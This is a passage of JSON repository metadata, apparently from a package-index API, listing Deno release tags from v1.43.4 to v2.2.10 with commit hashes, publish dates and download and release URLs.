","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"